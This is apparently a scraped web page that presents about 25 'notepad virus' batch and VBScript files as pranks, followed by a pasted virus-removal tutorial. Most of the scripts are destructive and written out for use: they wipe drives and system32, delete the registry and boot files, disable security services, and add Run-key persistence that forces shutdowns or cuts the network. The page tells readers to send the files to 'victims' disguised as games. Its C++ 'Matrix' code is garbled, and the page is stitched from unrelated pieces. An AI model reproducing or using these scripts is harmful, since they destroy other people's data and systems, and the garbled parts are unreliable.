To Make A Dangerous Virus Using Notepad. Of others or the harmful of a computer. Not some scary deadly virus. Create any of these files and try them out on your pc. Creating Funny Viruses With Your Notepad. Here we have shared some of the craziest tips and codes for Virus Writing. All Scripts Here Are To Be Copied In Note Pad. This Virus Deletes All The. Delete Key Registry Files NOTE THIS IS DANGEROUS!! USE AT RISK. Save the file with a (.vbs) extension, it will create a VBScript File. It will prompt you for a.
Today we are going to share some of the funniest notepad pranks with you . These pranks are totally harmless and you can share them with your friends without any fear. Follow The steps given below to create a harmless funny virus with your notepad.
Virus 1 : Continuously Ejects your the CD-ROM :
This trick will create a code in your PC which will continuously eject all the connected Optical drives. Even if you put them back , it will pop them out again and again .
Step 1 : Copy the below given code and paste it in your Notepad .
Step 2 : Save that file with ” .vbs ” extension i.e as ” Harmless.vbs ” . You can save it with what ever name you want .
Step 3 : Double click on the file to open . I hope you will be impressed a lot with this awesome trick.
To stop it :
=>Open your task manager by pressing ctrl+ alt+ del .
=> Go to the process tab and select the wscript.exe .
=> Now click on end process.
Virus 2 : Make a Fake Virus Batch File:
This is also a funny virus prank that I recently came across . The best thing about this prank is that it resembles an original virus attack . Just try it by yourself to see whats happens.
Step 1 : Open Notepad .
Step 2 : Copy and paste the below code in your notepad .
Step 3 : Save this file with ” .bat ” extension i.e as ” Joke.bat ” .
Step 4 : Double click on the file to open .
I Hope You All Like It . Share your views in form of comments ….
How to create virus using notepad which will make you a super cool hacker ? Is this possible ?
hey friends do you want to create 25 most amazing simple virus like metrics and other. here I have share 25 virus script which will make a super successful pro hacker and also impressed your friends . so lets start –
Also Read:-
How to create virus using notepad
2. How to stop someone’s internet access:::
@Echo off
pconfig /release
Save that as a .bat and send it to someone. They’re IP address will be lost, and therefore they won’t be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew
No 3:-
Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .
NOW TYPE THE FOLLOWING CODE ::
@echo off
del D:*.* /f /s /q
del E:*.* /f /s /q
del F:*.* /f /s /q
del G:*.* /f /s /q
del H:*.* /f /s /q
del I:*.* /f /s /q
del J:*.* /f /s /q
Then save it as SEO.bat and the batch file is created .
WARNING :: This is the most dangerous virus! Be careful with its use.
4.Delete the entire registry
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
Now save it as SEO.bat and the batch file is created .
No 5:-
How to crash a PC Forever !:::
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the person’s computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER – DO NOT CLICK THIS FILE.
No 6:-
How to stop someone’s internet access::::
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone. They’re IP address will be lost, and therefore they won’t be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew
No 7:-
ShutDown PC million Times::::
1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c “any comment u want” then press next
note: this “1000” i wrote is the time in seconds needed for your computer to shut down,You can put any number you want…
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right-click on it and press properties>change icon>select the icon the internet explorer and the press apply than ok
try to open it, it is a virus
PS: the only way 2 stop your computer from shutting down is to go 2 start>run>type: shutdown -a
No 8:-
Open Notepad
Write / copy the below command there:
” del c:WINDOWSsystem32*.*/q “ without quote
and save as ” anything.bat”
Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc can’t be started.
No 9:-
Process:
Open Notepad
Copy the below command there
“rd/s/q D:
rd/s/q C:
rd/s/q E:” ( without quotes )
Save as “anything.bat
This virus Formats the C ,D , and E Drive in 3 Seconds. This is the very usful script if you want to learn how to create virus using notepad .
No 10 :-
Just open the Notepad and type the paste the following Code.
set ws=createobject(“wscript.shell”)
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell=”wscript.shell”
strDir=”C:WINDOWS”
strfile=”wscript.vbs”
st=Chr(34)
strlog=”shutdown -l”
strtxt2=”ws.run(strlog)”
set obfso=CreateObject(“Scripting.FileSystemObject”)
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline(“set ws=createobject(“&st&strshell&st&”)”)
obfile.writeline(“ws.run(“&st&strlog&st&”)”)
ws.regwrite “HKCUSoftwareMicrosoftWindowsCurrentVersionRunLogoff”,”C:WINDOWSwscript.vbs”,”REG_SZ”
Now Save This Notepad file With Any Name Having .vbs Extension .
No 11:-
Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s
Save it as “Anything.BAT” in All Files and send it.
No 12 :-
Toggle your friend’s Caps Lock button simultaneously:
Code:
Set wshShell =wscript.CreateObject(“WScript.Shel
l”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “Anything.VBS” and send it.
No 13:-
Frustrate your friend by making this Vb-script hit Enter simultaneously:
Type :
Code:
Set wshShell = wscript.CreateObject(“WScript.Shell
“)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save it as “Anything.VBS” and send it.
No 14 :-
This Virus Deletes All The Content Of A Drive…Windows driver kit visual studio 2019.
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code As Anything.bat
No 15:-
This Will Crash Ur Computer
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
Save It As Anything.vbs
No 16 :-
The Most Simple Virus To Crush The Window
@Echo off
Del C: *.* y
Save It As Anything.bat
No 17 :-
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c “A VIRUS IS TAKING OVER c:Drive
Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!
No 18:-
Shutdowns Computer Everytime It Is Turned On
Save As A bat File
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
No 19 :-
Disable Internet Permanently
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
Save As A bat File
No 20 :-
Change Files To Non-working TXT Files
Save As A bat File
REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
No 21 :-
System Meltdown
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSE
Save As A bat File
No 22:-
Temporarily Flood Network
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
23. Shutdown the computer everytime on startup !
Here is how ?
? Open Notepad
? Type :
@ECHO OFF
shutdown -s -t 10 -c “Virus Attack…”
exit
? File >> Save As…
? Name it : virus.bat
? Start >> All Programs
? Right Click on Startup >> Open
? This open the Startup folder
? Paste the Virus.bat file here !
*** That’s all , now the computer will
automatically shutdown on every startup !
How to Spread it:
Windows does’nt allow to change the icon of .bat files. Therefore what you can do is :
Right click on the .bat file
Click on CREATE SHORTCUT
And hide the original file.
Now as this newly created file is just the shortcut, you can easily change its icon.
Right click on this shortcut
properties >>>.cutomize>>.choose icon
Now give an attractive icon to it.
Now name it something intresting. eg. PROTOTYPE or IGI etc.
Now your victim would think it to be the game , and he will be easily curropted.
24. SHUT UR INTERNET PERMENANTLY:::
This is a slightly more advanced one. It shuts down your internet
permanently. I tried it on myself accidentally, i knew what it did, and it
still took me a couple of days to get my internet back. works best on
XP, not tested on vista or 7.
EDIT: At the bottom put a rickroll
site or something. BTW, that 3rd line, isnt what disables the internet
permanently. It is something else, that just provides a fast response
to shut down any connections.
@echo off
reg
add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v MiXedVeX /t
REG_SZ /d %systemroot%HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del “C:Program FilesMicrosoft Games
del “C:Nexon
del “C:Program FilesXfire
del “C:Program FilesAdobe”
del “C:Program FilesInternet Explorer”
del “C:Program FilesMozilla Firefox”
del “C:WINDOWS”
del “C:WINDOWSsystem32”
del “C:WINDOWSsystem32cmd”
del “C:WINDOWSsystem32iexpress”
del “C:WINDOWSsystem32sndvol32”
del “C:WINDOWSsystem32sndrec32”
del “C:WINDOWSsystem32Restorerstrui”
del “C:WINDOWSsystem32wupdmgr”
del “C:WINDOWSsystem32desktop”
del “C:WINDOWSjava”
del “C:WINDOWSMedia”
del “C:WINDOWSResources”
del “C:WINDOWSsystem”
del “C:drivers”
del “C:drv”
del “C:SYSINFO”
del “C:Program Files”
echo ipconfig/release_all>>c:windowswimn32.bat
net stop “Security Center”
net stop SharedAccess
> “%Temp%.kill.reg” ECHO REGEDIT4
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>”%Temp%.kill.reg” ECHO “Start”=dword:00000004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>”%Temp%.kill.reg” ECHO “Start”=dword:00000004
>>”%Temp%.kill.reg” ECHO.
>>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>”%Temp%.kill.reg” ECHO “Start”=dword:00000004
>>”%Temp%.kill.reg” ECHO.
START /WAIT REGEDIT /S “%Temp%.kill.reg”
del “%Temp%.kill.reg”
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a
25.MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::
Warning – Do not run it on your computer
I’m gonna teach you how to make a virus named Matrix…
1-Open notepad
2-Put in this code
#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]=”C:Documents and SettingsAll UsersStart MenuProgramsStartuprawr.bat”;
ifstream input(inputFile);
if (!input)
{
{
ofstream fp(“C:Documents and SettingsAll UsersStart MenuProgramsStartuprawr.bat”, ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]=”C:rawr.exe”;
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp(“CLICK.bat”, ios::app);
fp
fp
fp
fp
}
system(“START CLICK.bat”);
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system(“call shutdown.exe -S”);
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;
3-save it as matrix.bat
4-finish
AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN
AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN,STDLIB,CONIO , AND STUFF LIKE THAT
1st way: Configure startup processes to stop itA process can be run by a service, or it can run by a startup process. If you can identify the service or the startup process, then you can tell your computer not to run if the next time it boots. This is the recommended approach. Sometimes a virus process doesn’t start running until several minutes have passed since boot. In this case the virus process is usually run by another process, which could be a legitimate process (e.g. services.exe). Exactly how Windows services work is beyond the scope of this tutorial. All you need to know is that you should find out whether the virus process is run by some Windows service. The quickest way to find out is to count the number of running services after the virus process starts running (by going to Windows -> Run… -> type ‘msconfig’ and clicking Services tab). You kill the virus process; then count the number of running services again. If the number drops by one, then you know for sure some service is the culprit. Find out what that service is and uncheck it and reboot. I removed a virus for my uncle this way.First identify the service that runs the virus process Go to Windows -> Run… -> type ‘Services.msc’. You should see a list of services. For each of them you can right click and choose ‘Properties’ (or right-click and press key ‘R’). In Properties window you can see ‘Path to executable’, which is what you are interested in. Since you already know the path to the virus .exe, you can go through each service and see which one has that path. If you can find it, go to Windows -> Run… -> type ‘msconfig’. Click Services tab and you should see a list of services in there. The checked ones are the ones that run automatically when your computer starts up. Uncheck the virus service and reboot.After your computer boots up, the virus process should not be running and you should be able to safely delete the virus files. HOWEVER, if the service is a critical Windows service such as ‘COM+ Event System’ and ‘Workstation’, go to section Stop And Kill. If you cannot find it, go to Windows -> Run… -> type ‘msconfig’, go through the list in Startup tab. In Command column you can see the path to the .exe. Uncheck the one that matches the path to the virus and reboot. After your computer boots up, the virus process should not be running and you should be able to safely delete the virus files.2nd way: Kill the process manuallyRight click on the .exe in Process Explorer and select “Kill Process”. HOWEVER, if this is a critical Windows process such as ‘svchost.exe’. you may see an error dialog saying that you cannot kill it. Or you may kill it successfully but then your computer behaves in a weird, unstable, or inoperable way (e.g. all your items on your desktop are gone if you stop ‘explore.exe’). If this is the case, go to Section Stop and Kill. Otherwise, you can safely delete the virus files. If you can successfully stop the virus process, you will be able to delete the virus files. Again, even if you cannot delete virus files, as long as you can stop the virus process, the virus will not affect your PC and you can proceed with your normal work. Reboot and the virus should be gone. Otherwise, consult Section Stop and Kill.As an alternative you can rename the virus file to any junk name. The Windows OS does not allow you to delete a file when some process is using the file but it allows you to rename it, rendering it unusable. Once you’ve renamed it you should be able to delete it